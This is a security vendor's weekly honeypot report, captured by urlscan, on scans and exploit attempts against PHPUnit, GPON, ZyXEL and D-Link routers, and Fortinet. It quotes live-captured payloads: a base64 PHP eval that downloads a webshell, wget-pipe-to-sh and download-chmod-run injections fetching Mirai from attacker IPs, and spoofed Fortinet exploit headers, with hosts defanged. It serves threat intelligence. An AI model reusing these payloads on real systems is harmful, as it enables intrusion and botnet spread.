tehtris.com
Open in
urlscan Pro
162.159.135.42
Public Scan
URL:
https://tehtris.com/en/blog/honeypots-activity-of-the-week-43/
Submission: On July 03 via api from SK — Scanned from DE
Submission: On July 03 via api from SK — Scanned from DE
Form analysis
0 forms found in the DOMText Content
Skip to content * Contact * Blog * Glossary English Français Deutsch Español / Toggle menu * Articles * Glossary Go to TEHTRIS website November 4, 2022 CERTHoneypots HONEYPOTS: ACTIVITY OF THE WEEK 43 Share on Facebook Share on Twitter Share on LinkedIn During week 43, TEHTRIS chose to highlight 4 malicious activities observed on its international honeypot network. * SSH scan: targeting terraria game servers * Focus on IP 51.77.247[.]119 * Routers’ vulnerabilities exploit to propagate Mirai botnet * User agent “Momentum” * User agent “r00ts3c-owned-you” * Attempts to exploit a Fortinet vulnerability SSH SCAN: TARGETING TERRARIA GAME SERVERS This week, 10 IP addresses attempted to use the login “terraria” (and variants) more than 560 times on the TEHTRIS honeypot network. IP sourceCount percentagesASCountry194.163.148[.]727.629%AS 51167 ( Contabo GmbH )DE139.99.9[.]14721.925%AS 16276 ( OVH SAS )SG15.235.114[.]7913.904%AS 16276 ( OVH SAS )CA167.86.69[.]678.378%AS 51167 ( Contabo GmbH )DE173.212.196[.]67.487%AS 51167 ( Contabo GmbH )DE135.125.194[.]204.635%AS 16276 ( OVH SAS )DE194.163.149[.]1414.635%AS 51167 ( Contabo GmbH )DE51.222.12[.]1374.635%AS 16276 ( OVH SAS )CA194.233.80[.]384.456%AS 141995 ( Contabo Asia Private Limited )SG137.74.0[.]2232.317%AS 16276 ( OVH SAS )PL These 10 IP addresses tested the same 27 login / password combinations. It is likely that these SSH scans are aimed at detecting and compromising Terraria game servers. TEHTRIS strongly recommends that you always change your default credentials to avoid exposing your servers to automatic scans. FOCUS ON IP 51.77.247[.]119 The French IP address 51.77.247[.]119, from AS 16276 (OVH SAS), launched a web request on 30/10/22 on a Lithuanian infrastructure including: * The URL /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, which makes it possible to exploit the CVE-2017-9841 (CVSS3: 9.8) vulnerability in PHPUnit, which allows an attacker to remotely execute code on a vulnerable site * The following query encoded in base 64 in the Raw Data: <?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9wYXN0ZWJpbi5wbC92aWV3L3Jhdy83ZDM4N2YxZSIsIkJ1Z3oucGhwIikpIHsKCWVjaG8gIlN1a3Nlc2dibGsiOwp9IGVsc2UgewoJZWNobyAiZmFpbCI7Cn0KPz4=')); ?> Decoded from base 64: <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(adminer("https[:]//pastebin[.]pl/view/raw/7d387f1e","Bugz.php")) { echo "Suksesgblk"; } else { echo "fail"; } ?> The function the attacker seeks to execute, presumably by exploiting the CVE-2017-9841 vulnerability, aims at downloading a file from the URL https[:]//pastebin[.]pl/view/raw/7d387f1e. This URL is unfavorably known from public databases, in particular for uploading a file (sha256: 753519b661cb2c8960c522a8836ba2c5400372cc7f0afff448b47aab3fbd2d2b) containing an obfuscated PHP webshell. This webshell is called FoxAutoV5 and is available on https[:]//anonymousfox[.]co. FoxAutoV5 (sha256 : 753519b661cb2c8960c522a8836ba2c5400372cc7f0afff448b47aab3fbd2d2b) FoxAutoV5 includes many features for exploring and searching for information on compromised machines, allowing the attacker to know its environment: where data with passwords are located, where are the vulnerabilities… It also provides bruteforce and lateral movement capabilities. This webshell is not very secure (there is no password to access it, for instance) but is encoded well enough to make some static searches ineffective and avoid detection. Its score on VirusTotal is only 2 / 61. Moreover, the IP 51.77.247[.]119 that caused this event appeared in malicious files exploiting the Log4j vulnerability (mentioned in week 42). ROUTERS’ VULNERABILITIES EXPLOIT TO PROPAGATE MIRAI BOTNET USER AGENT “MOMENTUM” 2 IP addresses were associated with the User Agent “Momentum” and sent the following URL request: /GponForm/diag_Form?images/ This URL aims to exploit the vulnerability CVE-2018-10561 (CVSS3: 9.8), concerning Dasan GPON routers and allows an attacker to bypass authentication (mentioned in week 39). If the vulnerability is active, the header indicates the server that will be contacted to download a malicious file (possibly a Mirai backdoor). Thus: * US IP 193.47.61[.]60 (AS 211252 DELIS LLC) is associated with the header ‘XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http[:]//185.132.53[.]105g -O-|sh&ipv=0′ * Singaporean IP 185.132.53[.]136 (AS 202437 – Julian Achter) is associated with the header ‘XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http[:]//45.95.55[.]214/o/g -O-|sh&ipv=0′ German IP 45.95.55[.]214 (AS 200303 – LUMASERV Systems) is known to propagate Mirai. In addition, the Momentum botnet targeting Linux systems was revealed in late 2019 and is known to distribute Mirai backdoors and enlist devices to perform DDoS attacks, among other things. USER AGENT “R00TS3C-OWNED-YOU” 10 IP addresses scanned for known vulnerabilities in some versions of ZyXEL, Billion (mentioned in week 39) and D-Link routers to spread the Mirai botnet. IP sourceASCountry111.118.40[.]97AS 7562 ( HCN Dongjak )KR137.25.54[.]5AS 20115 ( CHARTER-20115 )US209.93.149[.]48AS 6871 ( British Telecommunications PLC )GB59.187.205[.]166AS 7562 ( HCN Dongjak )KR143.159.103[.]77AS 6871 ( British Telecommunications PLC )GB172.91.47[.]43AS 20001 ( TWC-20001-PACWEST )US74.108.124[.]79AS 701 ( UUNET )US75.67.32[.]138AS 7922 ( COMCAST-7922 )US88.105.235[.]114AS 9105 ( TalkTalk )GB92.14.135[.]177AS 9105 ( TalkTalk )GB In rawdata, two types of commands are observed: ' remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http[:]//134.195.138[.]33/.nCKx/zx.arm7+-O+arm7;chmod+777+arm7;./arm7 selfr' remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=;cd /tmp;wget http[:]//46.19.141[.]122/zyxel;chmod 777 zyxel;sh zyxel;rm -rf arm7;#&r' IP 134.195.138[.]33 (US – AS 35913 – DEDIPATH-LLC) and 46.19.141[.]122 (CH – AS 51852 – Private Layer INC) are known to distribute the Mirai botnet. The Swiss IP was referred to in files SHA256 f4a46b4bc24cc2a0ce33d32ee057f31c1370c52caa3c8813669069a1d7351066 and 40efadebd319686595727d07b7b1e1518a89074098c05a2a746f7846efe1e161. ATTEMPTS TO EXPLOIT A FORTINET VULNERABILITY Following a PoC published in October 2022 by Horizon3 about the Fortinet vulnerability CVE-2022-40684 (CVSS3: 9.8) through which an attacker can log in as an admin, TEHTRIS observes that this PoC was used by attackers, using the same URL (/api/v2/cmdb/system/admin/admin), the same User Agent (“Report Runner”) and the same header (except the port was changed from 8888 to 9000) : ['forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;', 'connection: close', 'content-type: application/json', 'accept-encoding: gzip'] 6 IP addresses (4 of which are unknown from public databases) made these requests, presumably in a multi-vulnerability scan that includes CVE-2021-26086 (CVSS3: 5.3) affecting Atlassian Jira’s server and Data Center. IoC : IP sourceASCountry139.59.85[.]24AS 14061 ( DIGITALOCEAN-ASN )IN159.65.199[.]18AS 14061 ( DIGITALOCEAN-ASN )NL167.172.246[.]222AS 14061 ( DIGITALOCEAN-ASN )US172.105.91[.]134AS 63949 ( Linode, LLC )DE172.105.98[.]145AS 63949 ( Linode, LLC )CA178.128.43[.]0AS 14061 ( DIGITALOCEAN-ASN )GB As a reminder, attackers use automated systems to scan large portions of the internet to find vulnerabilities to exploit. Don’t leave the door open ! OUR LATEST ARTICLES June 20, 2024 HONEYPOTS: FOCUS ON HONEYPOTS HOSTED IN GERMANY May 31, 2024 UNRELEASED RAAS ANALYSIS- CASHRANSOMWARE May 30, 2024 HONEYPOTS: FOCUS ON CVE-2024-3273 SUBSCRIBE TO THE TEHTRIS NEWSLETTER. Once a month, receive the essential news and cyber watch by subscribing to the TEHTRIS newsletter. Subscribe to the newsletter POST NAVIGATION Previous article Honeypots: activity of the week 42 Next article XDR Success use case : Purple Fox KO To explore the subject SIMILAR PUBLICATIONS CERTHoneypots HONEYPOTS: FOCUS ON HONEYPOTS HOSTED IN GERMANY For the first half of May 2024, TEHTRIS honeypots hosted in Germany have been hit almost... Read more June 20, 2024 CERTHoneypots HONEYPOTS: FOCUS ON CVE-2024-3273 The CVE-2024-3273 (CVSSv3: N/A) was disclosed on the 3rd of April. It refers to a command... Read more May 30, 2024 CERTHoneypots OUR SELECTION OF ALERTS ON HONEYPOTS: REPORT 23 – DECEMBER 2023 The following report consists of TEHTRIS observations on our worldwide honeypots network to provide you with... Read more December 18, 2023 TEHTRIS XDR Platform EDR OPTIMUS MTD SIEM NTA Honeypots SOAR CTI Cyberia ZTR * XDR AI Platform * TEHTRIS XDR AI PLATFORM * TEHTRIS XDR AI PLATFORM * SOAR * Threat Intelligence * CYBERIA * Solutions * EDR OPTIMUS * MTD * SIEM * NTA * Honeypots * ECOSYSTEM * Discover our ECOSYSTEM * ZTR * Use cases * Industry * Critical infrastructures * Public administrations * Healthcare * Banking & Insurance * Transportation * Service providers * Retail * Education * Choosing TEHTRIS * Why choose TEHTRIS? * Why choose TEHTRIS? * Awards & certifications * TEHTRIS CERT * References * References & testimonials * MITRE ATTACK * Gartner * Services * Services * CyberSphere * CyberSphere Configurations * Cyber Intelligence * Cyber & Intelligence Expertise * Run et deployment support * Cybersecurity Academy * Partners * Service partners * MSSP * Distributing partners * TEHTRIS XCelerity * Technology partners * ECOSYSTEM * Technology partners * Affiliations * Becoming a partner * Company * About us * Discover TEHTRIS * Board Members * Comex * TEHTRIS’ teams * Careers * Our values * Join us * News * TEHTRIS news * CSR * Resources * Blog * Products news * Glossary * White papers * Press releases Cyber or not cyber ? Once a month, receive the essential news and cyber watch by subscribing to the TEHTRIS newsletter. Subscribe to the newsletter * Legal notice * Privacy and cookies policy * Legal documents * Contact * Contact DPO * False positive/False negative LinkedIn X YouTube Please take a moment to manageOur Cookies We've waited to be sure you were actually interested in our content. Consents certified by No, thanksI want to chooseOK! Axeptio consent Consent Management Platform: Personalize Your Options Our platform empowers you to tailor and manage your privacy settings, ensuring compliance with regulations. Customize your preferences to control how your information is handled.